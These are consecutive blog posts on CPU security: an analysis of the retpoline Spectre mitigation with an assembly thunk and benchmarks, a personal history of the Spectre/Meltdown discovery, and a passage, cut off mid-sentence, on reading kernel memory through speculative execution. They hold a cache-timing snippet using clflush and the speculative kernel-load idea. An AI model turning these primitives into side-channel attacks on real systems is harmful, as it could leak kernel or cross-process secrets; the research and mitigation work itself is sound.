In debt to Retpoline

 

The appendix was added on the 14th of February 2018, in response to comments made to me on Twitter. In this connection, “retpoline pause lfence” and “retpoline ud2” were added to the table. Other than that, only typos have been fixed since the original post.

Abstract

In this blog post I explore the retpoline mitigation that Paul Turner of Google suggested for the Spectre indirect branch variant issue [1]. I give a short differential side channel analysis along with a performance analysis. The impact of the use of a pause instruction in retpoline is discussed. Finally, I consider the technical debt that a widely deployed retpoline would impose on CPU developers.

 

How does retpoline work

This section follows Google’s presentation of retpoline closely [1]. I include it because it provides the context for the remainder of this blog post. A jmp rax is turned into the following code:

 

  1. call set_up_target;
  2. capture_spec:
  3.    pause;
  4.    jmp capture_spec
  5. set_up_target:
  6.    mov [rsp], rax
  7.    ret;

The call set_up_target (1) pushes the address of capture_spec (2) onto the return stack buffer (RSB, a CPU-internal buffer used to predict returns). It also pushes the address of capture_spec (2) onto the program stack and transfers control to set_up_target (5). The mov [rsp], rax (6) overwrites the return address on the program stack, so that the subsequent ret will pop the stack and return to the original target on its architectural path. The speculative path of the return, however, uses the value from the RSB, and thus the CPU will speculatively execute the code starting at (2). The pause instruction is meant to relinquish pipeline resources to co-located hyperthreads, and to save power if no co-located hyperthread is present. The jmp in line 4 repeats the pause until the speculative execution is rolled back once the ret in line 7 finishes executing.

 

In simple terms, this means the speculative path resolves to a spinlock and thus does not leak any information through a side channel. The architectural path eventually resolves correctly and the program runs as it is supposed to.
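For concreteness, here is the same thunk written as a GCC top-level inline-assembly block. This is a minimal sketch of my own for illustration, not Google’s published code; the symbol name retpoline_jmp_rax is made up, and ABI subtleties (red zone, full clobber lists) are glossed over:

#include <stdio.h>

/* Sketch of the retpoline thunk from the listing above (my own
 * illustration, not Google's published code). Control entering
 * retpoline_jmp_rax architecturally ends up at the address in rax,
 * while the speculative path spins at the pause/jmp pair. */
__asm__(
    ".globl retpoline_jmp_rax\n"
    "retpoline_jmp_rax:\n"
    "   call 1f\n"            /* line 1: push label 2 onto stack and RSB   */
    "2: pause\n"              /* lines 2-3: speculative path lands here    */
    "   jmp 2b\n"             /* line 4: ...and spins                      */
    "1: mov %rax, (%rsp)\n"   /* line 6: overwrite return addr with target */
    "   ret\n"                /* line 7: architectural path goes to *rax   */
);
void retpoline_jmp_rax(void); /* takes its target in rax, not a C argument */

static volatile int reached = 0;
static void target(void) { reached = 1; }

int main(void) {
    /* Emulate "call *rax": load the target into rax and call the thunk,
     * which itself behaves like "jmp rax". */
    __asm__ volatile("mov %0, %%rax\n\tcall retpoline_jmp_rax"
                     : : "r"(target) : "rax", "cc", "memory");
    printf("reached = %d\n", reached);
    return 0;
}

Calling the thunk is equivalent to call *rax: the thunk’s ret consumes the overwritten return address, and the caller’s own return address remains on top of the stack for the target to return through.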

 

Side channel analysis of retpoline

Retpoline’s architectural side channels consist of the eviction of an entry in the RSB caused by the call in line (1). This information is unlikely to bring an attacker much advantage, and exploiting it would require sufficient control of the RSB. Line 6 makes a store access on the stack. This is visible through a cache side channel to an attacker, provided the attacker has sufficient control. However, it is unlikely to provide much information, given that the stack is usually used by the functions themselves. It is worth noting that any information this side channel can provide is also provided by the original jmp rax. Presumably retpoline’s stack access provides slightly less information to an attacker than the original jmp rax instruction – i.e. cache set indexing bits instead of BTB indexing bits. Line 7 is more tricky: if the CPU updates the BTB after a misprediction, the BTB side channel will be similarly useful to that of the original jmp rax. I think it is likely that the BTB is not updated until retirement, so that this side channel isn’t present. Since the pause instruction (line 3) is a CPU hint, the CPU may take or ignore the hint at its discretion – more on this below. Thus, pause may or may not provide a side channel. If external power is plugged in and the hint is taken, one can see a co-located hyperthread speed up (see [2]), which is the purpose of having the pause instruction here, but which is certainly a side channel as well. If the CPU is running in power saving mode (e.g. an unplugged laptop), pause provides a side channel too, since executing a pause instruction on two co-located hardware threads causes a delay for both, presumably through C-state interaction; see [3]. In sum, I think the side channels provided by retpoline are less valuable than the side channel provided by the original indirect branch, but they are still present.

 

Performance analysis of retpoline

A jmp rax instruction takes about 4 clock cycles to execute and predicts correctly very often. Retpoline replaces it with a ret instruction which will always mispredict and thus executes far slower. However, unlike with hard serialization, the CPU seems able to continue without a pipeline flush once the ret instruction has been executed out of order, allowing out-of-order execution to continue. This creates two corner cases: one where dependencies block out-of-order execution across the indirect branch, and one where there is no dependence across the indirect branch. I managed to create a sequence of instructions where retpoline was just as fast as the original unpredicted branch – this is the case when the instructions after the branch depend on the results of the instructions before the branch. Obviously, any co-located hyperthread will be more affected by the retpoline than by a predicted indirect branch, but the thread itself does not lose any cycles. At first this seems weird, but imagine completely dependent integer ALU instructions on both sides of the indirect branch – with the branch unit being completely free, both retpoline and the indirect branch will execute concurrently with the integer ALU instructions before the branch. Since the integer ALU instructions after the branch depend on those before the branch, they only get scheduled for execution once all prior instructions have executed. Thus, retpoline and an indirect branch perform equally. In the case of no dependencies across the indirect branch, retpoline is slower: it will not allow out-of-order execution to continue until the ret instruction has executed, and consequently adds a penalty compared to a predicted indirect branch. In general, the longer it takes for the indirect branch to resolve, the higher the penalty of retpoline. There is also an indirect performance cost of retpoline which, in my opinion, is likely to be somewhat smaller. The call in line 1 pushes a return address onto the RSB (and consequently may evict the oldest entry in the RSB), potentially causing an RSB underflow once a previous call returns. An RSB underflow will manifest itself as a negative performance impact if the evicted RSB entry causes mispredictions or stalls in unrelated code later on. For this to happen, the call stack needs to be deeper than the size of the RSB. The stall penalty of the underflow was big enough for Intel to add prediction on underflow to the microarchitecture (for Broadwell and Skylake). If this prediction were as efficient as using the RSB, the RSB would not exist.

 

The following table presents the results of my microbenchmarking:

 

Unit: clock cycles       Mean     Std.dev   Median
jmp rsi                  350.33   95.48     346
retpoline pause          410.64   65.94     410
retpoline lfence         403.76   25.96     404
retpoline clean          402.13   19.99     402
retpoline pause lfence   406.74   64.76     404
retpoline ud2            404.29   28.70     402

“Retpoline clean” is without the pause instruction; “retpoline lfence” is with pause replaced by an lfence instruction. The results are generally not very stable over multiple runs, but the retpoline variants often end up with an average of around 400-410 cycles, with the indirect branch being around 50 clock cycles faster on average. Thus, some additional care should be taken before concluding that “retpoline pause” is slower than the others. I ran the tests with 100k observations and removed the slowest 10% of observations as a primitive noise reduction approach. The microbenchmark represents a bad case with no dependency across the indirect branch, using integer instructions (add rsi, 1 and add rbx, 1 respectively), and was run on an Intel i7-6700K. While the microbenchmarks are important for the arguments I put forth in this text, it is important to note that they are not reflective of whole-system performance: the incidence of indirect branches is relatively small, and this benchmark is manufactured to portray cases which are worse than normal scenarios. Also, the microbenchmark completely ignores any indirect effects.
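For reproducibility, here is a sketch of how such a harness might look. This is my reconstruction, not the original benchmark code; code_under_test is a placeholder for the branch sequence being measured:

#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <math.h>
#include <x86intrin.h>   /* __rdtscp */

#define TRIALS 100000

/* Placeholder for the code being measured, e.g. an indirect branch or a
 * retpoline thunk surrounded by independent add-chains. */
static void code_under_test(void) {
    __asm__ volatile("add $1, %%rsi" ::: "rsi", "cc");
}

static int cmp_u64(const void *a, const void *b) {
    uint64_t x = *(const uint64_t *)a, y = *(const uint64_t *)b;
    return (x > y) - (x < y);
}

int main(void) {
    static uint64_t t[TRIALS];
    unsigned aux;
    for (int i = 0; i < TRIALS; i++) {
        uint64_t start = __rdtscp(&aux);   /* waits for earlier instructions */
        code_under_test();
        t[i] = __rdtscp(&aux) - start;
    }
    qsort(t, TRIALS, sizeof t[0], cmp_u64);
    int kept = TRIALS * 9 / 10;            /* drop the slowest 10% as noise  */
    double mean = 0, var = 0;
    for (int i = 0; i < kept; i++) mean += (double)t[i];
    mean /= kept;
    for (int i = 0; i < kept; i++) var += ((double)t[i] - mean) * ((double)t[i] - mean);
    var /= kept - 1;
    printf("mean=%.2f std=%.2f median=%llu\n",
           mean, sqrt(var), (unsigned long long)t[kept / 2]);
    return 0;
}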

The weird case of pause

It immediately seemed weird to me to have the pause instruction in the spinlock in line 3 of retpoline. Usually we have pause instructions in spinlocks, but spinlocks execute architecturally at some point. Having a pause of 10 clock cycles on Broadwell and 100 on Skylake in the spinlock could cause the CPU to pause architectural work that needs to be done before the return instruction can execute, leading to a larger-than-necessary penalty. However, pause is not a normal instruction: it is a hint to the CPU, and my guess is that the hint is not taken here. I ran retpoline on my Broadwell and my Skylake and compared the penalty: there was almost no difference. This is important because we would expect the different implementations of pause to give different average latencies if it were actually executed speculatively (10 clk vs. 100 clk). Another argument for pause not being executed speculatively is that pausing is connected to a VM exit. I can only guess why Intel made it possible to get a VM exit on the pause instruction. I think the most compelling reason would be to let the hypervisor process small work items during a guest spinlock’s pause instead of just idling the CPU. This would probably also help with virtualizing hardware. If I am right about this, it would be sensible for the pause hint to take effect only at retirement instead of pausing the CPU speculatively. Another argument is power management: the behavior of the pause instruction depends on the C-state of a co-located hyperthread. Presumably this gives us one of the two side channels described in a previous section. There is little reason why a CPU designer would pause a thread that is executing other instructions out of order.

 

Discussion of technical debt of retpoline

As clever as retpoline seems, I think it is fundamentally broken – not because it does not work, but because it builds up a large amount of technical debt. Adding retpoline to a piece of software requires CPU designers to make sure that this legacy software remains compatible with new CPUs. If a company like Google applies retpoline in their infrastructure, it is fairly unproblematic: Google has a nice inventory of the software running on their systems and can make sure that software deployed to new CPUs is recompiled, so this poses no constraints on a CPU designer. However, if we add retpoline to a compiler, we can be sure it will end up in all kinds of software, including virtual machines, containers, specialized software, etc. These pieces of software often do not remain supported, they are poorly catalogued, and consequently, if the behavior of retpoline changes significantly, these systems may perform suboptimally, be unsafe, or even break completely. This effectively ties the hands of CPU designers as they strive to improve the CPU in the future.

 

The first concrete problem I see is the use of the pause hint: regardless of whether the pause hint is taken in retpoline or not, its non-intended use in retpoline ties down the behavior of this instruction for CPU designers in future generations of CPUs. It is worth noting that we already have at least 3 different implementations of the pause hint in different CPUs (treated as a nop, stall 10 clks, stall 100 clks) [5]. Adding the complexity of the instruction I outlined above, it is fair to assume that this instruction might need changes in future generations of CPUs. Thus, having the pause hint from retpoline scattered over software everywhere might turn out to be a bad idea in the long term. The good news is that there probably is a good solution: replacing the pause instruction with lfence will serialize the speculative path and probably even stop it from looping. Effectively stopping the execution of the spinlock may free up resources for a co-located hyperthread, as well as branch execution units in the main thread that would otherwise be tied up by the jmp instruction in line 4. I ran some tests on Skylake and found near-identical performance results for pause and lfence, suggesting that this is a viable solution. It is important to note that the lfence instruction was previously documented to only serialize loads, but it silently serialized all instructions – which is now the documented behavior since Intel published their errata documents for the Spectre/Meltdown patches [7]. So, the mortgage on lfence is small and has already been signed.
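Concretely, the change amounts to swapping a single instruction in the thunk. A sketch of mine, not an official implementation, with a made-up symbol name:

/* Sketch: retpoline thunk with lfence in place of pause (my own
 * illustration). lfence serializes the speculative path, so the
 * spinlock body should execute at most once speculatively. The
 * "retpoline ud2" variant in the table swaps in ud2 instead. */
__asm__(
    ".globl retpoline_jmp_rax_lfence\n"
    "retpoline_jmp_rax_lfence:\n"
    "   call 1f\n"
    "2: lfence\n"            /* was: pause */
    "   jmp 2b\n"
    "1: mov %rax, (%rsp)\n"
    "   ret\n"
);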

 

The second concrete problem I see – the construct retpoline uses to direct speculative execution into the spinlock – is a much bigger one. On Skylake, return instructions can predict using the indirect branch predictor, requiring Skylake to be handled differently from other CPUs. The problem is twofold: on the one hand, the very common ret instruction needs to be replaced with retpoline (or other non-speculative branching); on the other hand, a hardware interrupt arriving in line 6 may underflow the RSB in the interrupt handler. Thus, retpoline is already potentially unsafe on some CPUs (though in my opinion much less unsafe than having no retpoline). The technical debt here is that retpoline may become completely unsafe if future CPUs stop relying on the RSB for return prediction. There may be many reasons for a CPU designer to change this – for example, a completely unified system for indirect branches, or prediction of monotonic returns (returns with only one return address). The latter would keep the RSB safe from non-monotonic returns when the RSB underflows, and thus might perform better with deep call stacks. I do not know whether these things are good ideas, but retpoline might effectively rule them out. Also, one could imagine conflicts with future CPU-based control-flow integrity systems, etc.

 

One could argue that performance optimizations rely on microarchitectural details all the time, but there is an important difference between breaking a performance optimization and breaking a security patch. We already see problems with software vendors updating broken libraries; it is not difficult to imagine what would happen if secure software became insecure because of CPU evolution.

 

Instead of taking on technical debt potentially forever, I suggest we use either a less secure option (i.e. lfence ahead of indirect branches) or a more expensive option such as IBPB [7] or replacing indirect calls with iret (which is documented to be serializing). That constitutes a high price now, but avoids paying rent on technical debt in perpetuity.

 

Conclusion

Retpoline is an effective mitigation, on some CPUs, for the Spectre variants that rely on causing misprediction of indirect branches. From a pure side channel perspective, retpoline adds a different side channel, but it is nonetheless an improvement over the side channel of a traditional indirect branch. Retpoline’s performance penalty is complex, but likely smaller than the penalty of the serializing alternatives. However, as retpoline relies on assumptions about the underlying microarchitecture, it adds technical debt if used widely. If Google, Microsoft, or anyone else with managed software deployment wants to use it, they have my blessing, but there are reasons for scepticism about having it in general purpose compilers. CPU vendors’ short-term marketing deficits should not lead us to trade small short-term performance gains for technical debt that will have to be paid back, with interest, in the form of a more complex microarchitecture in the future.

Appendix added 14th of February 2018

Stephen Checkoway of the University of Illinois at Chicago commented that it might be worth testing an ud2 instruction in the speculatively executed spinlock. I find this idea promising: ud2 essentially just throws an “invalid opcode” exception, and thus abusing it for retpoline is likely to produce performance equivalent to that of lfence, perhaps even better. Further, it is unlikely that using this instruction is associated with any technical debt. The simple test results show that the direct performance impact is approximately similar to that of the other versions of the spinlock (see table above).

Some implemented versions of retpoline use a pause followed by an lfence instruction. I added this combination to the performance table as well. Thanks to Khun Selom & @ed_maste (Twitter account).

 

 

Literature

[1] Turner, Paul. “Retpoline”. https://support.google.com/faqs/answer/7625886

[2] Fogh, Anders. “Two covert channels”. https://cyber.wtf/2016/08/01/two-covert-channels/

[3] Fogh, Anders “Covert Shotgun”. https://cyber.wtf/2016/09/27/covert-shotgun/

[4] Intel. “Intel® 64 and IA-32 Architectures Software Developer’s Manual: Vol 3”. https://www.intel.com/content/www/us/en/architecture-and-technology/64-ia-32-architectures-software-developer-system-programming-manual-325384.html

[5] Intel. Intel® 64 and IA-32 Architectures Optimization Reference Manual. July 2017. https://software.intel.com/sites/default/files/managed/9e/bc/64-ia-32-architectures-optimization-manual.pdf

[6] Evtyushkin, Dmitry, Dmitry Ponomarev, and Nael Abu-Ghazaleh. “Jump over ASLR: Attacking branch predictors to bypass ASLR.” Microarchitecture (MICRO), 2016 49th Annual IEEE/ACM International Symposium on. IEEE, 2016.

[7] Intel, “Speculative Execution and Indirect Branch Prediction Side Channel Analysis Method”, https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00088&languageid=en-fr

Behind the scenes of a bug collision

Introduction

In this blog post I’ll speculate as to how we ended up with multiple researchers arriving at the same vulnerabilities in modern CPUs concurrently. The conclusion is that the bug was ripe because of a years-long build-up of knowledge about CPU security, carried out by many research groups. I’ll also detail the rough story behind the research that led me to the bug. My story is probably different from that of the other researchers, but I am relatively sure the overall pattern is the same for most researchers on most security issues: security research is a long-haul thing. The remainder of this blog post is semi-technical.

Why did we get a bug collision on Spectre/Meltdown?

This is of course my take on the events – my personal story, which I’ll detail below. Research collision in CPU research isn’t that uncommon. In fact, the story of my friendship with Daniel Gruss is a series of collisions. In 2015 I was preparing a talk about row hammer for Black Hat with Nishat Herath [2] when Daniel tweeted that he was able to flip bits from Javascript. I didn’t want to face questions I couldn’t answer, so I started researching it, and literally the evening before Daniel published how he was doing it, I knew how he did it. Later Daniel teased me about detecting cache side channels when there were no L3 cache misses. I replied: ‘are you timing clflush?’ He was indeed. You’ll find me acknowledged in the paper for this reason [1]. I told him he shouldn’t worry about me competing on publishing it, because I was doing research on a side channel in the row buffer and didn’t have time to compete on clflush. Turns out he and the WU cache clan were too. I blogged it, and the WU cache clan wrote a paper on it, Pessl et al. [3]. You’ll find me acknowledged there as well. Not long after that, I did a blog post on breaking KASLR with the prefetch instruction. Obviously, Daniel was doing the exact same thing again. We had had enough of competition and started my by now regular collaboration with the WU cache clan after that point.

So why do things like this happen? (Granted, the story about Daniel is a freaky one.) Well, CPU research is much like drawing a map of an uncharted world. Researchers start from known research and proceed into the unknown, and if they find something, they document it and add it to the map. This essentially means that the frontier looks very similar to everybody, leading people down the same paths. This process is very much sustained by the fact that almost all research in this area is academic, and academia is much better organized in terms of recording and documenting than hackers are.

For a thing like Meltdown, the real foundation was laid with the work on cache side channels back around 2005. There are many papers from this time; I’ll mention Percival [4] because it’s my favorite. Another milestone was Yuval Yarom’s paper on Flush+Reload [5]. Note that Yuval is also party to the Spectre paper. With this foundation, a subgenre of papers emerged in 2013 with Hund, Willems & Holz [6]. They noticed that when an unprivileged user tries to read kernel mode memory, the CPU actually does a great part of the read process before raising an error, allowing a user to observe not the data of the kernel, but the layout of the kernel – this is known as a KASLR break and is important for classical exploits. This work was followed up with improvements, including Gruss et al. [7] and Jang et al. [8]. Both papers showed that a lot more work was being done by the CPU than was strictly needed when an unprivileged user accesses kernel memory – an important prerequisite for Meltdown to exist. Also in 2016, another KASLR break, using branches, emerged from Evtyushkin et al. [9]. They didn’t try to read from the kernel but rather found that branch prediction leaked information. This is important because branch prediction is a precursor for speculative execution and thus built a bridge towards Meltdown. Felix Wilhelm [10] extended Evtyushkin et al. [9] to hypervisors, which is likely to be important in the rationale for hypervisors being affected. In fact, I think Jann Horn mentioned this work as an inspiration. There were other works, like that of Enrique Nissim [11], which showed that a KASLR break applies to real-world classic exploits. Also in 2016, work was being done on side channels in the pipeline; my Covert Shotgun blog post is an example of this literature [12]. To sum it up: by the end of 2016 it was known that unprivileged reads of kernel memory triggered more processing than was strictly required, it was known that branches were important, and there was work going on examining the pipeline. In effect, the Meltdown bug was surrounded on all sides. It was a single blind spot on the map – obviously, nobody knew that there’d actually be a bug in this blind spot, and I think most did not believe such a bug existed. Other people would probably pick other papers – there were many. My point remains: a lot of people moved towards this find over a very long period of time.

The personal perspective
I work for GDATA Advanced Analytics, in an environment that is very friendly and supportive of research. Without research, a consulting company like ours cannot provide excellence for its customers. However, CPU bugs don’t pay the bills, so my day job does not have much to do with this. I spend my time helping customers with their security problems: malware analysis, digital forensics, and incident response are the main tasks I do on a day-to-day basis. This means that the bulk of the work I do on CPUs is done in my spare time, after hours.

My story with Meltdown and Spectre essentially starts at Black Hat 2016, where Daniel Gruss and I presented our work on the prefetch instruction. The video of our talk can be found here [13]. As described above, this work slowly gave me the fuzzy feeling that maybe it was just the tip of the iceberg. In fact, I did a blog post on the meta of breaking KASLR in October 2016 [14] and presented it at RuhrSec 2017 [15], so I was very well acquainted with that literature. Meanwhile, I wanted to get away from working with caches, accidentally found some covert channels, and wrote about them [16]. I thought there might be more and started picking apart the pipeline in search of covert channels. My frustration led me to automate finding covert channels, which resulted in this blog post [12] and later a talk at HackPra [17]. In the talk, you can hear that I’m still frustrated: “I don’t care, I’ll just use a shotgun”. To this day I have many unanswered questions about the pipeline.
Later that year I met up with the WU cache clan at CCS, where we were presenting the academic version of the prefetch KASLR break [7]. We had some beer-fueled conversations, which continued at Black Hat Europe (where Michael Schwarz and I did a talk on the row buffer side channel we’d done concurrent work on). There I started believing that Meltdown might be possible, but still without a clue as to how it could possibly work.

I finally made the connection to speculative execution in December 2016/January 2017, when I prepared the presentation for HackPra about Covert Shotgun [17]. There are a lot of slides about speculative execution in it. At first, I didn’t think about reading kernel memory; my first “attack” was just another attack on KASLR – essentially Hund, Willems & Holz in a speculative version. That work never really got finished (timing inside speculative execution is possible, but not easy – I did not find a solution to this problem until much later). The rationale for doing it was that it would solve a problem with their method, and I could do this stuff in my spare time – fun is essential, and this sounded like fun. So my project name for Meltdown was “undead KASLR”, despite me quickly figuring out there was bigger fish to be fried. I told my friend Halvar Flake about the weird ideas while presenting at IT-Defense in February, and his encouragement was a big part of why I continued, because I didn’t believe it would work.

In March, I had the first chance to do some real work on the project during a small getaway from work to present Jacob Torrey’s and my work on PUFs (the work was really mostly Jacob’s – and not related to Meltdown per se) at Troopers 17. I researched in the mornings in the hotel and even did some research during other people’s talks. Fun fact: there is a video of me doing a Spectre-style attack PoC on the code I’d added to Alex Ionescu’s wonderful SimpleVisor. Hi Alex! I’m the bald head seen to the lower left of the center aisle, doing weird head movements and packing away my laptop as I succeeded, around 19 minutes into the video. The second half of the talk was pretty awesome btw!!

Later in March 2017, I visited Daniel, Michael, and Clementine Maurice in Graz to work on a common project we had on detecting double fetch bugs with a cache attack (which became this paper [21]). Here I tried to pitch my idea, because with the workload I had, I knew it would be difficult to realize it alone. Unfortunately, I wasn’t the only one fully booked out, and Daniel, Michael, and I were super skeptical at that time, despite the slight encouragement I’d had at Troopers. So we decided to finish the stuff we were already doing first. Might I add here that Daniel and Michael have done some really cool stuff since then? Struggling with work and with making a sufficient contribution to the double fetch paper, the project was on ice. The main reason why my name is so far back on that paper is that I didn’t have time to pull my weight.

After Troopers, I didn’t get much done and was really frustrated about it. So in July, I started back up again in the evenings. It helped me immensely that my climbing partner suffered an injury, giving me a bit more time. This time around I was working directly towards Meltdown. I was doing things much too complicated at first and wasted a lot of time on that. Then I tried to simplify things as much as I could, and this is why I ended up with a negative result. I wrote up the blog post on company time, on a Friday before noon, before leaving early on a vacation. Luca Ebach helped proofread it. If he hadn’t, it would’ve been unreadable and Tomasulo would’ve been spelled wrong. The “Pandora’s box” part of the blog post is a reference to the limited and unfinished stuff I did on “Spectre”, which I was sure would work at the time, but which needed checking before I’d commit to blogging about it. While on vacation, I decided to wrap things up in an academic paper and, with some positive results in my hands, seek help from some academic professionals. So I continued my research afterward – after all, you don’t open Pandora’s box without looking at what is inside. In light of recent events, I shall not be publishing the rest of the stuff I did.

The stuff that Jann Horn did is really, really awesome, and the same goes for the Spectre/Meltdown papers. It is wonderful to see that I was barking up the right tree. It is important to me to mention that Jann Horn reported his research prior to my blog post and did not have access to mine prior to that date.

Literature

[1] Gruss, Daniel, et al. “Flush+ Flush: a fast and stealthy cache attack.” Detection of Intrusions and Malware, and Vulnerability Assessment. Springer International Publishing, 2016. 279-299.
[2] Nishat Herath, Anders Fogh. “These Are Not Your Grand Daddy’s CPU Performance Counters” Black Hat 2015, https://www.youtube.com/watch?v=dfIoKgw65I0
[3] Pessl, Peter, et al. “DRAMA: Exploiting DRAM Addressing for Cross-CPU Attacks.” USENIX Security Symposium. 2016.
[4] Percival, Colin. “Cache missing for fun and profit.” (2005).

[5] Yarom, Yuval, and Katrina Falkner. “FLUSH+ RELOAD: A High Resolution, Low Noise, L3 Cache Side-Channel Attack.” USENIX Security Symposium. 2014.
[6] Hund, Ralf, Carsten Willems, and Thorsten Holz. “Practical timing side-channel attacks against kernel space ASLR.” Security and Privacy (SP), 2013 IEEE Symposium on. IEEE, 2013.
[7] Gruss, Daniel, et al. “Prefetch side-channel attacks: Bypassing SMAP and kernel ASLR.” Proceedings of the 2016 ACM SIGSAC Conference on Computer and Communications Security. ACM, 2016.
[8] Jang, Yeongjin, Sangho Lee, and Taesoo Kim. “Breaking kernel address space layout randomization with intel tsx.” Proceedings of the 2016 ACM SIGSAC Conference on Computer and Communications Security. ACM, 2016.
[9] Evtyushkin, Dmitry, Dmitry Ponomarev, and Nael Abu-Ghazaleh. “Jump over ASLR: Attacking branch predictors to bypass ASLR.” Microarchitecture (MICRO), 2016 49th Annual IEEE/ACM International Symposium on. IEEE, 2016.
[10] Wilhelm, Felix. “Mario BASLR”. https://github.com/felixwilhelm/mario_baslr
[11] Nissim, Enrique. “I Know Where Your Page Lives: De-randomizing the Windows 10 Kernel”. https://www.youtube.com/watch?v=WbAv2q9znok
[12] Fogh, Anders. “Covert Shotgun”, https://cyber.wtf/2016/09/27/covert-shotgun/
[13] Fogh, Anders, Gruss, Daniel. “Using Undocumented CPU Behavior to See Into Kernel Mode and Break KASLR in the Process” Black Hat 2016.
[14] Fogh, Anders. “Micro architecture attacks on KASLR”. https://cyber.wtf/?s=kaslr
[15] Fogh, Anders. “Micro architecture attacks on KASLR and More”, https://www.youtube.com/watch?v=LyiB1jlUdN8
[16] Fogh, Anders, “Two covert channels”, https://cyber.wtf/2016/08/01/two-covert-channels/
[17] Fogh, Anders. “Covert Shotgun”, HackPra 2017. https://www.youtube.com/watch?v=oVmPQCT5VkY&t=34s
[18] Schwarz, Michael, Fogh, Anders. “Drama: how your DRAM becomes a security problem”. Black Hat Europe 2016 https://www.youtube.com/watch?v=lSU6YzjIIiQ
[19] Ionescu, Alex. “SimpleVisor”. https://github.com/ionescu007/SimpleVisor
[20] Neilson, Graeme, “Vox Ex Machina”, Troopers 17. https://www.youtube.com/watch?v=Xrlp_uNBlSs&t=1145s
[21] Schwarz, Michael, et al. “Automated Detection, Exploitation, and Elimination of Double-Fetch Bugs using Modern CPU Features.” arXiv preprint arXiv:1711.01254 (2017).
[22] Fogh, Anders. “Negative result: reading kernel memory from user mode” https://cyber.wtf/2017/07/28/negative-result-reading-kernel-memory-from-user-mode/

Negative Result: Reading Kernel Memory From User Mode

I was going to write an introduction about how important negative results can be. I didn’t. I assume you can figure out for yourself why that is, and if not, you have all the more reason to read this blog post. If you think it’s trivial why my result is negative, you definitely need to read this blog post.

The memory subsystem

I think most researchers would immediately think that reading kernel memory from an unprivileged process cannot work because of “page tables”. That is what the Instruction Set Architecture, or ISA, says. But to understand why that was unsatisfactory to me, we need to dig a bit deeper, and I’ll start at the beginning.

 
When software running on a core requires memory, it starts a so-called “load” command. The load command is then processed in multiple stages until the data is found and returned or an error occurs. The figure below shows a simplified version of this subsystem.

[Figure: simplified memory hierarchy]

Software, including the operating system, uses virtual addressing to start a load (which is what a memory read is called inside the CPU). The first stage of processing is the L1 cache, which is split into a data cache and an instruction cache. The L1 cache is a so-called VIPT, or Virtually Indexed, Physically Tagged, cache. This means the data can be looked up directly using the virtual address of the load request. This, along with its central position in the core, makes the L1 incredibly fast. If the requested data is not found in the L1 cache, the load must be passed down the cache hierarchy. This is the point where the page tables come into play. The page tables are used to translate the virtual address into a physical address; this is essentially how paging works on x64. It is during this translation that privileges are checked. Once we have a physical address, the CPU can query the L2 cache and L3 cache in turn. Both are PIPT caches (Physically Indexed, Physically Tagged), thus requiring the page table translation before the lookup can be done. If the data is in none of the caches, the CPU will ask the memory controller to fetch it from main memory. The latency of a data load from the L1 cache is around 5 clock cycles, whereas a load from main memory is typically around 200 clock cycles. With the security check happening in the page tables, and the L1 located before those, we see already at this point that the “because page tables” argument is too simple. That said, the Intel software developer’s manuals [1] state that the security settings are copied along with the data into the L1 cache.
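These latency differences are easy to observe directly. A small sketch, assuming an x86-64 GCC/Clang environment (exact cycle counts vary by machine and include measurement overhead):

#include <stdint.h>
#include <stdio.h>
#include <x86intrin.h>   /* _mm_clflush, _mm_mfence, __rdtscp */

static uint64_t time_load(volatile char *p) {
    unsigned aux;
    _mm_mfence();                  /* order against earlier memory ops */
    uint64_t t0 = __rdtscp(&aux);
    (void)*p;                      /* the load we time */
    uint64_t t1 = __rdtscp(&aux);
    return t1 - t0;
}

int main(void) {
    static char buf[64];
    (void)*(volatile char *)buf;   /* warm-up: bring the line into L1 */
    uint64_t hot = time_load(buf);
    _mm_clflush(buf);              /* evict the line from all cache levels */
    _mm_mfence();
    uint64_t cold = time_load(buf);
    printf("cached: %llu cycles, flushed: %llu cycles\n",
           (unsigned long long)hot, (unsigned long long)cold);
    return 0;
}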

 

Speculative execution

In this and the next section I’ll outline the argumentation behind my theory – but only outline it. For those a bit more interested, it might be worth looking at my talk at HackPra from January [3], where I describe the pipeline in slightly more detail, though in a different context. Intel CPUs are superscalar, pipelined CPUs, and they use speculative execution; that plays a big role in why I thought it might be possible to read kernel memory from an unprivileged user mode process. A very simplified overview of the pipeline can be seen in the figure below.

 

[Figure: simplified pipeline]

The pipeline starts with the instruction decoder. It reads bytes from memory, parses the buffer, and outputs instructions, decoding them into micro-ops. Micro-ops are the building blocks of instructions. It is useful to think of x86 CPUs as a Complex Instruction Set Computer (CISC) with a Reduced Instruction Set Computer (RISC) backend. It’s not entirely true, but it’s a useful way to think about it. The micro-ops (the reduced instructions) are queued into the reorder buffer. Here micro-ops are kept until all their dependencies have been resolved. Each cycle, any micro-ops with all dependencies resolved are scheduled onto available execution units in first-in, first-out order. With multiple specialized execution units, many micro-ops execute at once, and importantly, due to dependencies and bottlenecks in execution units, micro-ops need not execute in the same order in which they entered the reorder buffer. When a micro-op finishes executing, its result and exception status are added to its entry in the reorder buffer, thus resolving dependencies of other micro-ops. When all micro-ops belonging to a given instruction have been executed and have made it to the head of the reorder buffer queue, they enter retirement processing. Because the micro-ops are at the head of the reorder buffer, we can be sure that retirement happens in the same order in which the micro-ops were added to the queue. If an exception was flagged in the reorder buffer for a micro-op being retired, an interrupt is raised on the instruction to which the micro-op belonged. Thus the interrupt is always raised on the instruction that caused it, even if the offending micro-op was executed long before the entire instruction was done. A raised interrupt causes a flush of the pipeline, so that any micro-op still in the reorder buffer is discarded and the instruction decoder is reset. If no exception was flagged, the result is committed to the registers. This is essentially an implementation of Tomasulo’s algorithm [2], and it allows multiple instructions to execute at the same time while maximizing resource use.

 

Abusing speculative execution

Imagine the following instruction executed in usermode

mov rax,[somekernelmodeaddress]

It will cause an interrupt when retired, but it’s not clear what happens between the instruction finishing execution and the actual retirement. We know that once it is retired, any information it may or may not have read is gone, as it’ll never be committed to the architectural registers. However, maybe we have a chance of seeing what was read if Intel relies perfectly on Tomasulo’s algorithm. Imagine the mov instruction sets the result in the reorder buffer as well as the flag that retirement should cause an interrupt and discard any data fetched. If this is the case, we can execute additional code speculatively. Imagine the following code:

mov rax, [Somekerneladdress]

mov rbx, [someusermodeaddress]

If there are no dependencies, both will execute simultaneously (there are two execution units for loads), and while the second will never get its result committed to the registers – it’ll be discarded when the first mov instruction causes an interrupt to be thrown – it will nonetheless execute speculatively, and it may change the microarchitectural state of the CPU in a way that we can detect. In this particular case, the second mov instruction will load

someusermodeaddress

